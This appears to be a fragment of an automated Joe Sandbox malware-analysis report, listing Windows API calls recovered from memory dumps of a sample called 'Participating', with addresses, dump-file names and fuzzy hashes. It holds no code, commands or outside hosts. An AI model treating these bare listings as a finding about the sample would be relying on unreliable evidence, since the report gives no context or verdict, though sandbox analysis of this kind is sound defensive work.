                                                                                                                                                                                                                                                                    • Part of subcall function 00CFF9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00D40354,00000000,00000000,?,?,00D51A02,?,7735E610,?,00D40354), ref: 00CFFA18
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 666041331-0
                                                                                                                                                                                                                                                                  • Opcode ID: 09124562c77a8399cd52f2df4bb837669d585abb6a09a486dbb6aea6fe2fdce5
                                                                                                                                                                                                                                                                  • Instruction ID: 9666ab7f8eb77bd55a3f27bd39ad385431cf12ba4077288070e0c53515f5d03e
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 09124562c77a8399cd52f2df4bb837669d585abb6a09a486dbb6aea6fe2fdce5
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FA513835600245DFCB01DF68C4949A9FBF5FF09314B088099E84AAB362D731EE86CBA1
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00D7766B
                                                                                                                                                                                                                                                                  • SetWindowLongW.USER32(?,000000EC,?), ref: 00D77682
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00D776AB
                                                                                                                                                                                                                                                                  • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00D5B5BE,00000000,00000000), ref: 00D776D0
                                                                                                                                                                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00D776FF
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Window$Long$MessageSendShow
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3688381893-0
                                                                                                                                                                                                                                                                  • Opcode ID: 8f2a7e01e86e2eba858d0cfd9a91d304aa19c2da15112e06423e5168a83ff4b7
                                                                                                                                                                                                                                                                  • Instruction ID: 735dd00644bc579fb5a8b3ee4209cf7b8c1e78e430708daf30a23378ff3637bc
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8f2a7e01e86e2eba858d0cfd9a91d304aa19c2da15112e06423e5168a83ff4b7
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8041E235A08604AFD7688F2CCC48FA97B65FB09350F198624F85DA73E4E270ED40DA70
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _free
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 269201875-0
                                                                                                                                                                                                                                                                  • Opcode ID: b4aa054f7d91773fbb4eed52f7645209673ba9057dc0720ed363a8fe82ddd21e
                                                                                                                                                                                                                                                                  • Instruction ID: 10ef4c26285dfb0e1b03c48236adb699dfd7afafaca2dba4aac25fbfd0919e31
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b4aa054f7d91773fbb4eed52f7645209673ba9057dc0720ed363a8fe82ddd21e
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D441D372A00200AFCB20DF78D881AADB7E1EF89314F154568E515EB395DA32ED51CBA0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetCursorPos.USER32(?), ref: 00CE19E1
                                                                                                                                                                                                                                                                  • ScreenToClient.USER32(00000000,?), ref: 00CE19FE
                                                                                                                                                                                                                                                                  • GetAsyncKeyState.USER32(00000001), ref: 00CE1A23
                                                                                                                                                                                                                                                                  • GetAsyncKeyState.USER32(00000002), ref: 00CE1A3D
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: AsyncState$ClientCursorScreen
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 4210589936-0
                                                                                                                                                                                                                                                                  • Opcode ID: 80b97454c2a43f01ecd93b27382cc7a799e30ddb4723ff2a0ab60398ac35766a
                                                                                                                                                                                                                                                                  • Instruction ID: 7abffb6875c7041b0d1af6c001c3d5d5b22b3b938220a7d5c19dcc8ecc05eea4
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 80b97454c2a43f01ecd93b27382cc7a799e30ddb4723ff2a0ab60398ac35766a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9A41A171A0425AFFDF059F64D844BFEB771FF05324F248229E869A3290D7346AA0DB61
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetInputState.USER32 ref: 00D54310
                                                                                                                                                                                                                                                                  • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00D54367
                                                                                                                                                                                                                                                                  • TranslateMessage.USER32(?), ref: 00D54390
                                                                                                                                                                                                                                                                  • DispatchMessageW.USER32(?), ref: 00D5439A
                                                                                                                                                                                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D543AB
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2256411358-0
APIs
• GetWindowRect.USER32(?,?), ref: 00D42262
• PostMessageW.USER32(00000001,00000201,00000001), ref: 00D4230E
• Sleep.KERNEL32(00000000,?,?,?), ref: 00D42316
• PostMessageW.USER32(00000001,00000202,00000000), ref: 00D42327
• Sleep.KERNEL32(00000000,?,?,?,?), ref: 00D4232F
Memory Dump Source
• Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
• Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
Similarity
• API ID: MessagePostSleep$RectWindow
• String ID:
• API String ID: 3382505437-0
APIs
• InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,00D5CC63,00000000), ref: 00D5D97D
• InternetReadFile.WININET(?,00000000,?,?), ref: 00D5D9B4
• GetLastError.KERNEL32(?,00000000,?,?,?,00D5CC63,00000000), ref: 00D5D9F9
• SetEvent.KERNEL32(?,?,00000000,?,?,?,00D5CC63,00000000), ref: 00D5DA0D
• SetEvent.KERNEL32(?,?,00000000,?,?,?,00D5CC63,00000000), ref: 00D5DA37
Similarity
• API ID: EventInternet$AvailableDataErrorFileLastQueryRead
• String ID:
• API String ID: 3191363074-0
APIs
• SendMessageW.USER32(?,00001053,000000FF,?), ref: 00D761E4
• SendMessageW.USER32(?,00001074,?,00000001), ref: 00D7623C
• _wcslen.LIBCMT ref: 00D7624E
• _wcslen.LIBCMT ref: 00D76259
• SendMessageW.USER32(?,00001002,00000000,?), ref: 00D762B5
Similarity
• API ID: MessageSend$_wcslen
• String ID:
• API String ID: 763830540-0
APIs
• IsWindow.USER32(00000000), ref: 00D613AE
• GetForegroundWindow.USER32 ref: 00D613C5
• GetDC.USER32(00000000), ref: 00D61401
• GetPixel.GDI32(00000000,?,00000003), ref: 00D6140D
• ReleaseDC.USER32(00000000,00000003), ref: 00D61445
Similarity
• API ID: Window$ForegroundPixelRelease
• String ID:
• API String ID: 4156661090-0
APIs
• GetEnvironmentStringsW.KERNEL32 ref: 00D1D146
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D1D169
  • Part of subcall function 00D13B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00D06A79,?,0000015D,?,?,?,?,00D085B0,000000FF,00000000,?,?), ref: 00D13BC5
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00D1D18F
• _free.LIBCMT ref: 00D1D1A2
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00D1D1B1
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
• Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: _memcmp
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(0000000A,?,?,00D0F64E,00D0545F,0000000A,?,00000000,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00D13170
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00D131A5
                                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00D131CC
                                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00D131D9
                                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00D131E2
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ErrorLast$_free
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00D40831,80070057,?,?,?,00D40C4E), ref: 00D4091B
                                                                                                                                                                                                                                                                  • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00D40831,80070057,?,?), ref: 00D40936
                                                                                                                                                                                                                                                                  • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00D40831,80070057,?,?), ref: 00D40944
                                                                                                                                                                                                                                                                  • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00D40831,80070057,?), ref: 00D40954
                                                                                                                                                                                                                                                                  • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00D40831,80070057,?,?), ref: 00D40960
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 00D4F2AE
                                                                                                                                                                                                                                                                  • QueryPerformanceFrequency.KERNEL32(?), ref: 00D4F2BC
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000000), ref: 00D4F2C4
                                                                                                                                                                                                                                                                  • QueryPerformanceCounter.KERNEL32(?), ref: 00D4F2CE
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32 ref: 00D4F30A
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2833360925-0
                                                                                                                                                                                                                                                                  • Opcode ID: 42f73447bbbcde744dd53aa0c7dfd0bd73b5c13ce94a5d9e23404d62558e4853
                                                                                                                                                                                                                                                                  • Instruction ID: 862f8c7928fa23c57e08f0807bcab98af55a1154dde8570a2cfc8812fb41d9e2
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 42f73447bbbcde744dd53aa0c7dfd0bd73b5c13ce94a5d9e23404d62558e4853
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 51015771C01629EBCF00AFA4E84DAEEBBB9FF08710F400466E941F2260EB309594C7B5
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00D41A60
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000000,?,?,00D414E7,?,?,?), ref: 00D41A6C
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00D414E7,?,?,?), ref: 00D41A7B
                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00D414E7,?,?,?), ref: 00D41A82
                                                                                                                                                                                                                                                                  • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00D41A99
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
• Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 842720411-0
                                                                                                                                                                                                                                                                  • Opcode ID: 602b378ad127b7b2ae8410df7eebec5763e11dc700dbc4c9dae16fb1b3a72470
                                                                                                                                                                                                                                                                  • Instruction ID: 0f43ec2f0260cbd998d295b13c8ca9be2c161fffd694b388fff41b6b579375b3
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 602b378ad127b7b2ae8410df7eebec5763e11dc700dbc4c9dae16fb1b3a72470
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 67018CB9601305BFDB114FA4EC49E6A3B7EEF883A4B250424F849D7360EB31DC818A70
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00D41976
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00D41982
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00D41991
                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00D41998
                                                                                                                                                                                                                                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00D419AE
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
• Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 44706859-0
                                                                                                                                                                                                                                                                  • Opcode ID: 96b9b7e0ed409e1b16f41c9156197aae6fd3644de68bd6f962fbc8f4ae59cdf4
                                                                                                                                                                                                                                                                  • Instruction ID: a7901e7749ee3c17b0fbc4f650daaf5a533f81f186624edd4c1d4c32b64e3007
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 96b9b7e0ed409e1b16f41c9156197aae6fd3644de68bd6f962fbc8f4ae59cdf4
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B9F06D79200301ABDB214FA4EC59F563BBEFF897A0F140414FE49D73A0EA70E8808A70
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00D41916
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00D41922
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00D41931
                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00D41938
                                                                                                                                                                                                                                                                  • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00D4194E
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
• Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 44706859-0
                                                                                                                                                                                                                                                                  • Opcode ID: cb05c1cca102a97a161f5e52d2dc0ed47d2fa15261d21f28cd84d16f432c986b
                                                                                                                                                                                                                                                                  • Instruction ID: 108d4d39628ef90b101605b891ba7c54e7018a614d06342482dbdedcfb6355ca
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cb05c1cca102a97a161f5e52d2dc0ed47d2fa15261d21f28cd84d16f432c986b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EEF0627A100301ABDB210F65DC4DF563B7EEF897A0F540414FA49D7360DA70DC808A70
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,00D50B24,?,00D53D41,?,00000001,00D23AF4,?), ref: 00D50CCB
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,00D50B24,?,00D53D41,?,00000001,00D23AF4,?), ref: 00D50CD8
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,00D50B24,?,00D53D41,?,00000001,00D23AF4,?), ref: 00D50CE5
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,00D50B24,?,00D53D41,?,00000001,00D23AF4,?), ref: 00D50CF2
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,00D50B24,?,00D53D41,?,00000001,00D23AF4,?), ref: 00D50CFF
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,00D50B24,?,00D53D41,?,00000001,00D23AF4,?), ref: 00D50D0C
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
• Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CloseHandle
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                  • Opcode ID: 37626697f4d639db6fbbc0505074c1c1352090057ea4c239ec7cb4457423f953
                                                                                                                                                                                                                                                                  • Instruction ID: f6488eec97920ebb7db983291a0fb392fab32f08bac62f7677375ab742d6cb3e
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 37626697f4d639db6fbbc0505074c1c1352090057ea4c239ec7cb4457423f953
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5C01A272800B55DFCB30AF66D980826FBF5BF503163198A3FD99652931C7B0A988DF90
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00D465BF
                                                                                                                                                                                                                                                                  • GetWindowTextW.USER32(00000000,?,00000100), ref: 00D465D6
                                                                                                                                                                                                                                                                  • MessageBeep.USER32(00000000), ref: 00D465EE
                                                                                                                                                                                                                                                                  • KillTimer.USER32(?,0000040A), ref: 00D4660A
                                                                                                                                                                                                                                                                  • EndDialog.USER32(?,00000001), ref: 00D46624
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3741023627-0
